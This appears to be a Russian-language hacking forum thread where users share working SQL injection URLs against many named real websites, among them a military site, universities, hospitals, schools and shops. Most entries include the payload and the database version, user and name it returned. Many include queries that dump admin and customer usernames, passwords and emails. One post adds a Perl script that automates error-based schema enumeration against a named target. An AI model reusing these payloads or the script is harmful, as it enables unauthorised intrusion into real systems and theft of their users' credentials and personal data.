Пример запроса: http://www.homesurveysolutions.com/cms.php?ID=-12'+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),3,4,group_concat (0x0b,table_name),6,7,8,9+from+information_schema. tables--+
version - 5.0.89-community
user - web247-hss@localhost
database - web247-hss
os - pc-linux-gnu

Вооруженные силы Гана

http://www.gaf[antigoogle].mil.gh/index.php?CatId=80+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15--

user() : dbo156151652@212.227.119.15

version() : 4.0.27-max-log

database() : db156151652

OS : pc-linux-gnu

PR - 5

админка (http://www.gaf.mil.gh/admin/login.php)

http://www.gdnet.org/cms.php?id=conference_details&conference_id=-11%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

User: browse@cweb3
Database: gdnet
Version: 5.0.45

Вот здесь же есть таблица с юзерами, но не могу вывести данные.
http://www.gdnet.org/cms.php?id=conference_details&conference_id=-11%27+union+select+1,2,group_concat%28column_name% 29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29+from+information_schema.c olumns+where+table_name=%27users%27--+
Кто знает как вывести логин;пасс юзера напишите в ПМ.

Сайт: http://www.erf.org.eg
ТИЦ: 10
PR: 7
Пример запроса: http://www.erf.org.eg/cms.php?id=conferences_details&conference_id=-2+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31--+
version - 4.1.20
user - root@localhost
database - newerf
os - redhat-linux-gnu

============================================

Сайт: http://www.code-corner.com
ТИЦ: 0
PR: 6
Пример запроса: http://www.code-corner.com/cms.php?id=portfolio_listing&company_category_id=-3+union+select+concat_ws(0x0b,version(),user(),dat abase(),@@version_compile_os),2,3,4,5,6,group_conc at(0x0b,username,0x3a,pass,0x3a,email),8,9,10,11,1 2,13,14,15+from+admin--+
version - 5.1.41
user - corners_corners@localhost
database - corners_corners
os - unknown-linux-gnu

============================================

Сайт: http://english.anqahe.org
ТИЦ: 0
PR: 5
Примеры запросов: http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,now(),7,group_concat(0x0b ,username,0x3a,pass),9,10,11,12,13+from+admin--+

http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,now(),7,group_concat(0x0b ,username,0x3a,pass),9,10,11,12,13+from+users--+

http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,concat_ws(0x0b,version(), user(),database(),@@version_compile_os),7,group_co ncat(0x0b,email),9,10,11,12,13+from+member--+
version - 5.1.41
user - anqahe_anqahe_en@localhost
database - anqahe_anqahe_en
os - unknown-linux-gnu

============================================

Сайт: http://www.humanas.unal.edu.co
ТИЦ: 10
PR: 5
Пример запроса: http://www.humanas.unal.edu.co/cms.php?id=940+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(co ncat_ws(0x0b,version(),user(),database(),@@version _compile_os),floor(rand(0)*2)))--+
version - 5.1.42-log
user - accesocms@www.humanas.unal.edu.co
database - cms
os - unknown-freebsd

============================================

Сайт: http://www.bota.org.uk
ТИЦ: 0
PR: 4
Пример запроса: http://www.bota.org.uk/cms.php?id=-93'+union+select+1,2,3,concat_ws(0x0b,version(),us er(),database(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15--+
version - 4.1.20
user - bota@localhost
database - bota
os - redhat-linux-gnu

============================================

Сайт: http://www.aptekaslonik.pl
ТИЦ: 0
PR: 4
Пример запроса: http://www.aptekaslonik.pl/index.php?c=483)+or+(select+count(*)+from+(select+ 1+union+select+2+union+select+3)x+group+by+concat( concat_ws(0x0b,version(),user(),database(),@@versi on_compile_os),floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch8
user - aptekaslonik@localhost
database - aptekaslonik
os - pc-linux-gnu

============================================

Сайт: http://www.autismbuddy.com
ТИЦ: 0
PR: 4
Пример запроса: http://www.autismbuddy.com/cms.php?id=-2+union+select+concat_ws(0x0b,version(),user(),dat abase(),@@version_compile_os)--+
version - 4.1.22-standard
user - autism_autism@localhost
database - autism_myautismbuddy
os - pc-linux-gnu

============================================

Сайт: http://meirmedicalcenter.org
ТИЦ: 0
PR: 3
Пример запроса: http://meirmedicalcenter.org/cms.php?id=-8+union+select+1,group_concat(0x0b,version(),0x0b, user(),0x0b,database(),0x0b,@@version_compile_os,0 x0b,admin_userid,0x3a,admin_password),3,4,5,6,7,8, 9+from+tbl_admin--+
version - 5.0.91-log
user - mmcdb@68.178.254.230
database - mmcdb
os - unknown-linux-gnu

Сайт www.k-rabota.ru
http://www.k-rabota.ru/resume/index.php?id=560+and+substring%28version%28%29,1,1 %29=5--+
===========================================
Это Blind sql-injection

version() - 5.1. ... (дальше не стал определять)
user() - k-rabota@localhost
database() - k-rabota
os - portbld-freebsd

Сайт: http://www.liveauctiontalk.com
ТИЦ: 0
PR: 3
http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os),4,group_concat( 0x0b,login_id,0x3a,password),6,7,8,9,10+from+lat_a dmin--+

http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,now(),4,group_concat(0x0b,cust omer_id,0x3a,password,0x3a,email),6,7,8,9,10+from+ lat_customer--+
version - 5.0.77
user - liveauction@204.12.36.28
database - liveauction
os - redhat-linux-gnu

==========================================

Сайт: http://www.thebomarestaurant.com
ТИЦ: 0
PR: 1
http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+distinct+1,concat_ws(0x0b,version (),user(),database(),@@version_compile_os),group_c oncat(0x0b,vfsl_mem_email)+from+vfsl_member--+

http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+1,2,group_concat(0x0b,vfsl_adm_lo g_id,0x3a,vfsl_adm_pass,0x3a,vfsl_adm_email)+from+ vfsl_admin--+
version - 5.0.26-standard-log
user - dbvfsl@202.191.42.18
database - vfsl
os - pc-linux-gnu

==========================================

Сайт: http://ricebrokeronline.com
ТИЦ: 0
PR: 1
http://ricebrokeronline.com/cms.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_name,0 x3a,password),5,6,7,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os)+from+administra tor--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBRICEBROKER
os - UNKNOWN-LINUX-GNU

==========================================

Сайт: http://e-ricelab.com
ТИЦ: 0
PR: 1
http://e-ricelab.com/cms.php?id=-4+union+select+1,2,3,group_concat(0x0b,user_name,0 x3a,password),5,6,7,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os)+from+administra tor--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBERICELAB
os - UNKNOWN-LINUX-GNU

http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME)+from +information_schema.tables--

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),2,3,4, 5+--

version : 4.1.22-log
user : u15962@localhost
database : u15962
os : portbld-freebsd6.2

ненашёл таблицу с именами юзверей только pwd

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+group_concat(pwd,0x3a+SEP ARATOR+0x0b),2,3,4,5+from+users+--

есть доступ к чтению файлов

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+load_file(0x2f686f6d652f) ,2,3,4,5+from+users+--

Сайт: http://www.wifiarab.com
ТИЦ: 0
PR: 3
http://www.wifiarab.com/module.php?id=-5+union+select+concat_ws(0x3a3a,version(),user(),d atabase(),@@version_compile_os),2--+

http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strUsername,0x3a3a,str Password),2+from+tbladmin--+

http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strEmail,0x3a3a),2+fro m+tblemaillist--+
version - 5.0.91-log
user - wifiarab@68.178.254.187
database - wifiarab
os - unknown-linux-gnu

==========================================

И 2 блайнда =\

==========================================

Сайт: http://www.plastic-jeunesse.ru
ТИЦ: 100
PR: 4
http://www.plastic-jeunesse.ru/php/content.php?id=1041+and+substring(version(),1,1)=5--+
version - 5.x

==========================================

Сайт: http://www.urolocus.ru
ТИЦ: 450
PR: 3
http://www.urolocus.ru/php/content.php?id=219+and+substring(version(),1,1)=5--+
version - 5.x

http://www.torus.com.au/index.php?page=games&id=-53+union+select+1,concat_ws(char(58),user,password ),3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user+whe re+user=char(119,119,119)

user() : www@localhost

version() : 5.0.77

database() : website

OS: красная шапочка

File_priv : Y

PR-4

Это за хоккей :mad: :mad: :mad:

http://www.bma.cz/forum/forum.php?id=-4+union+sele ct+1,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6--

Database Version : 4.1.21-log
Database name : bma_cz
User : bma_cz@localhost
OS : pc-linux-gnu

----------------------------------------

http://www.drsteiner.cz/en/detail.php?id=-32+union+select+1,concat_ws(0x3a,version(),databas e(),us er( )),3,4,5,6,7,8,9,10,11,12,13,14,15--

Database Version : 5.0.32-Debian_7etch12-log
Database name : drsteiner
User : drsteiner@setebos.czechia.com
OS : pc-linux-gnu

Логин и пасс в админку детские ;)

----------------------------------------

http://www.schnauzer.cz/chst_raz.php?id=-4+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6,7,8,9,10,11--

Database Version : 4.0.24'-Max'-log
Database name : schnauzercz
User : schnauzercz@thor
OS : mandrake-linux-gnu

http://www.zou.ru/popup.php?id=-1184+union+select+concat_ws(0x3a,database(),versio n(),user()),2,3+from+users%20--Database: 111
Version: 5.5.0-m2-community
User: zou@localhost
PR: 4
ТИЦ: 300

нашёл пароли, но не могу найти админку. гляньте, может кому повезёт.

http://lostandlonesome.com.au/release_detail.php?desc=bart-&amp-friends-make-you-blush&id=-1+union+select+1,2,3,concat_ws(0x3a3a3a,version(), database(),user()),5,6,7--

5.0.51a-3ubuntu5.4:::lostandlonesome_new:::lostlone@116.24 0.206.16

PR:4

Сайт: http://www.jazzimpuls.nl
ТИЦ: 0
PR: 5
http://www.jazzimpuls.nl/show.php?id=-79'+union+select+1,2,unhex(hex(concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os))),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34--+
version - 4.1.11
user - jazzimpu_root@localhost
database - jazzimpu_user
os - redhat-linux-gnu

============================================

Сайт: http://www.doctordavidclark.com
ТИЦ: 0
PR: 4
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),5,6,group_conc at(0x0b,login,0x3a,pass),8,9,10+from+ddc_admin--+

http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,e mail,0x3a,pass),8,9,10+from+ddc_members--+

http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,u sername,0x3a,user_password,0x3a,user_email),8,9,10 +from+ddc_users--+
version - 5.0.91-log
user - nexdoctordavidDB@208.109.181.160
database - nexdoctordavidDB
os - unknown-linux-gnu

============================================

Сайт: http://www.gaycity.nl
ТИЦ: 0
PR: 3
http://www.gaycity.nl/shownw.php?id=-351'/*union*/union/*select*/select/**/1,2,3,concat_ws(0x0b,version(),user(),database(),@ @version_compile_os),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32

============================================

Сайт: http://www.listenlive.nl
ТИЦ: 0
PR: 0
http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,concat_ws(0x0b,version(), user(),database(),@@version_compile_os),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,unhex(hex(group_concat( 0x0b,user,0x3a,password))),20,21,22,23+from+mysql. user--+

http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,now(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,unhex(hex(group_concat(0x0b,user name,0x3a,password,0x3a,email))),20,21,22,23+from+ members--+
version - 5.0.37-log
user - stations@localhost
database - stations
os - unknown-linux-gnu

http://www.4wdsystems.com.au/index.php?id=-1+union+select+1,concat_ws(0x3a3a3a,version(),data base(),user()),3,4,5,6,7,8,9,10--
PR 2

5.0.90-community-log:::wc449836_db:::wc449836_jess@localhost

http://www.grate.ru/index.php?cat_id=-5+union+select+group_concat(0x0b,table_name),2,3,4 ,5,6,7,8,9,10+from+information_schema.tables--

http://www.swiss.org.au/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a3a, version(),database(),user()),10,11,12,13,14,15,16, 17,18,19--

4.1.22-standard-log:::swisst db:::swisst@10.194.10.144

PR 4

едушки и все такое

PR>5

MS_ACCESS

http://www.cortland.edu/polsci/default.asp?page_id=-19+union+select+1,2,3+from+"table"

PR-6
---------------------------------
MSSQL

http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+top+1+@@version+from+inf ormation_schema.tables)--

@@version : Microsoft SQL Server 2005 - 9.00.3080.00

OS : Windows Server 2003

Platform : Intel X86

PR-6
--------------------------------
MS_ACCESS

http://www.ndus.edu/reports/details.asp?id=-245+union+select+1,username,3,4,5,6,7,8,9,10,11,12 ,13,14+from+"table"

PR-6
--------------------------------
MySQL

http://www.rch.org.au/plastic/edu.cfm?doc_id=-5860+union+select+1,2,3,4,aes_decrypt(aes_encrypt( concat_ws(0x3a,user(),version(),database(),@@versi on_compile_os),1),1),6,7+from+users/*

PR-6
--------------------------------
MSSQL
http://www.pace.edu/page.cfm?doc_id=14128&frame=news/read.cfm?id=829+or+1=@@version

PR-7
--------------------------------
MS_ACCESS

http://cooklibrary.towson.edu/getResourcesBySubject.cfm?subjectID=-77+union+select+1,2+from+"table"

PR-7
--------------------------------
http://historywired.si.edu/object.cfm?ID=123+or+1=@@version

@@version : Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Enterprise Edition

OS : Windows Server 2008 (x64)

PR-8

скромненько продолжу школьную тему :)

http://sch1265.ru/pages.php?id=-28+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5%20--
Database: sch1265_base
Version: 5.0.83-0ubuntu3
User: sch1265_sch1265@localhost

PR: 6
http://www.rso.cornell.edu/progressive/articles.php?id=196'+UNION+SELECT+1,version(),3,4, 5,6,7,8,9,10+LIMIT+1,1%23

PR: 6
http://news.mainemaritime.edu/articles.php?id=-26'+union+select+1,2,3,4,unhex(hex(version()))+--+

PR 3
http://tnt.ya1.ru/interesno/gallery.php?id=-27+union+select+1,group_concat(uname,0x3a,upasswd) ,3,4,5+from+users--

Сайт: http://agenda.gaynews.nl
ТИЦ: 0
PR: 4
http://agenda.gaynews.nl/show.php?id=17349'+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(mid(concat_ws(0x0b,version(),user(),database(),@ @version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32

============================================

Сайт: http://www.crew4you.nl
ТИЦ: 0
PR: 1
http://www.crew4you.nl/show.php?id=22'+union+select+1,concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os),grou p_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+c fy_users--+&hid=0

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+cr_users--+&hid=0

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+dg_users--+&hid=0

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+md_users--+&hid=0

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat( 0x0b,user,0x3a,password),4,5,6,7,8+from+dg_clients--+&hid=0
version - 5.1.45
user - forest_music@localhost
database - forest_music
os - redhat-linux-gnu

============================================

Сайт: http://www.tekcursus.nl
ТИЦ: 0
PR: 0
http://www.tekcursus.nl/website/show.php?formid=2+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(concat_ws(0x0b,version(),user(),database(),@@ version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.12-standard
user - datekcursu_webdb@localhost
database - datekcursu_webdb
os - pc-linux-gnu

============================================

Устал я от этого msaccess'а, сливаю =\

============================================

Сайт: http://www.spokanemarcom.com
ТИЦ: 0
PR: 4
Вывод нескольких записей с перебором:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+1,(select+top+1+username%2bchr(59) %2bpassword+from+members)%2bchr(58)%2b(select+top+ 1+username%2bchr(59)%2bpassword+from+members+where +username%2bchr(59)%2bpassword+not+in+(select+top+ 1+username%2bchr(59)%2bpassword+from+members)),3,4 ,5,6,7,8,9,10,11+from+members%00

Просто вывод с перебором:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassw ord%2bchr(59)%2bemail,3,4,5,6,7,8,9,10,11+from+mem bers+where+username%2bchr(59)%2bpassword%2bchr(59) %2bemail+not+in+(select+top+1+username%2bchr(59)%2 bpassword%2bchr(59)%2bemail+from+members)+order+by +id%00

============================================

+ ещё парочка сайтов с этой субд..

============================================

Сайт: http://www.martinitiles.com
ТИЦ: 0
PR: 1
http://www.martinitiles.com/item2.php?id=197+union+select+1,2,data,4,5,6+from+ msysaccessobjects+where+type=1%00

============================================

Сайт: http://www.uni-bright.com
ТИЦ: 0
PR: 1
http://www.uni-bright.com/item2.php?id=167+union+select+1,2,data,4,5,6+from+ msysaccessobjects+where+type=1%00

http://www.ahfeixi.gov.cn/include/news_view.php?ty=1&ID=-11184+union+select+1,2,concat(user(),char(58),vers ion(),char(58),database()),4,5,6,7,8,9,10,11,12,13 ,14--

PR-5

http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',version(),database(),user(),@@vers ion_compile_os,@@tmpdir,@@datadir)),floor(rand(0)* 2)))--+

5.0.77-community-nt:mostwanted:globaluname@localhost:Win32:C:\WI...

>400 БД
> 40 таблиц tbladminuser

http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',username,password)+FROM+seodata.ad min+limit+0,1),floor(rand(0)*2)))--+

http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',loginname,pass,admin)+FROM+resumex .users+limit+0,1),floor(rand(0)*2)))--+

в подарочек:#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;

#my $proxy="http://xxx.xxx.xxx.xxx:port";
#$ua->proxy(['http','https'],$proxy);

my $i=0;
while(1)
{
my $req = HTTP::Request->new(GET => "http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+SCHEMA_NAME+FROM+information_schema.SCHEMATA+lim it+$i,1),floor(rand(0)*2)))--+");
my $res = $ua->request($req);

if ($res->as_string =~ /Duplicate entry(.+)for/)
{
open(FILE,'>>results.txt');
print "print $i: $1\n";
print FILE "$1\n";
close(FILE);
$i++;
}
else {last;}
}

www.cam-systems.ca/industry-news.php?id=99999999+union+select+1,concat(0x3a,0x 3a,email,0x3a,0x3a,pass,0x3a,0x3a),3,4,5,6+from+tb l_account+limit+1,1%23

www.redebemreceber.com.br/news.php?id=999999+union+select+1,2,3,4,concat(0x3 a,usuario,0x3a,senha,0x3a),6,7+from+usuarios%23

www.shereno.co.za/news.php?id=9999+union+select+1,concat(0x3a,login, 0x3a,passwd,0x3a),3+from+cmsusers%23

Сайт: http://www.mortgagebrokers.com
ТИЦ: 0
PR: 4
http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,concat_ws(0x0b,version(),use r(),database(),@@version_compile_os),group_concat( 0x0b,users_name,0x3a,password,0x3a,email),6,7,8+fr om+lime_users--+

http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,emai l),6,7,8+from+filogix_brokers--+

http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,logi nname,0x3a,password,0x3a,email),6,7,8+from+mb_minv is_user--+

http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,last name,0x3a,password,0x3a,email),6,7,8+from+mb_realt or--+

http://www.mortgagebrokers.com/mbcom/txt/cms.php?id=-46+union+select+1,2,3,now(),group_concat(0x0b,last name,0x3a,password,0x3a,email),6,7,8+from+pm_users--+
version - 5.0.27
user - alexhad@localhost
database - alexhad
os - redhat-linux-gnu

==========================================

Сайт: http://www.thelodge-scotland.com
ТИЦ: 0
PR: 3
http://www.thelodge-scotland.com/cms.php?id=32+union+select+1,2,concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os),4,5--+
version - 4.1.22-standard
user - thelodge_lodge@localhost
database - thelodge_test
os - pc-linux-gnu

==========================================

Сайт: http://www.doctorrbrand.com
ТИЦ: 0
PR: 0
http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),group_concat(0x0b, username,0x3a,password),4,5+from+admininfo--+

http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,now(),group_concat(0x0b,user_name ,0x3a,password,0x3a,email),4,5+from+user--+

http://www.doctorrbrand.com/cms.php?id=-8+union+select+1,now(),group_concat(0x0b,email),4, 5+from+newsletter_subscribers--+
version - 5.0.37-log
user - mydoctor@localhost
database - dronline
os - portbld-freebsd6.1

http://profile.wow.com/includes/friendRequest.php?userId=527/**/union/**/select/**/1,2+from+mysql.user/*
or

http://profile.wow.com/guild/?id=0+union+select+1+from+user/*


or

http://profile.wow.com/includes/friendRequest.php?userId=99+and+1=if((select+subst ring(version(),1,1)<=5),1,(select+1+union+select+2))

blind-sqlinj


user(): wow_rw@305.1
database(): wow
version(): 5.0.41-log

table:users
---> column : imageId
---> column : nameUrl
---> column : bio
---> column : beta
---> column : buddyIcon
---> column : sns
---> column : banned
---> column : admin
---> column : date
---> column : name
---> column : private
---> column : email
---> column : newUser
---> column : guid
---> column : betaSigned
---> column : userId
---> column : entryDate
---> column : status
---> column : facebookId


Спасибо Pashkela и Jokester! :)

вот и собственно сайт :)

http://www.baytnet.com/dynamic.php?id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Pas sword),1),1),4+from+/*!baytnet_baytdb.member*/

user() : baytnet_baytuse@localhost

version() : 5.0.90-community

database() : baytnet_baytdb

datadir : /var/lib/mysql/

OS : pc-linux-gnu (@@VeRsIon_cOmPile_Os :) )

PR-3

user:version:database = roaauser@localhost:5.0.45-log:roaa

PR 6

403 http://www.romarch.org/admin/ :(

http://www.romarch.org/pags.php?id=-18+union+select+1,group_concat(user,0x3a,pass),3,4 +FROM+users--


+


Коммунисты
http://magkprf.ru/news.php?id=-615+union+select+1,2,3,4,group_concat(COLUMN_NAME) ,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_N AME=0x7573657273--

http://www.clubmayak.ru/press.php?code=-4+%75%6e%69%6f%6e+%73%65%6c%65%63%74+concat_ws(@@v ersion,user(),database(),@@version_compile_os),2,3 ,4,5,6+--

е-магазин

http://www.fashionbootsite.com/products.php?id=-2+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9+FROM+admininfo--

http://www.readplus.com.au/blog_detail.php?id=-1+union+select+1,concat_ws(0x3a3a3a,userid,passwor d,email,superuser),3,4,5,6,7,8,9,10+from+readplus_ login--

PR 5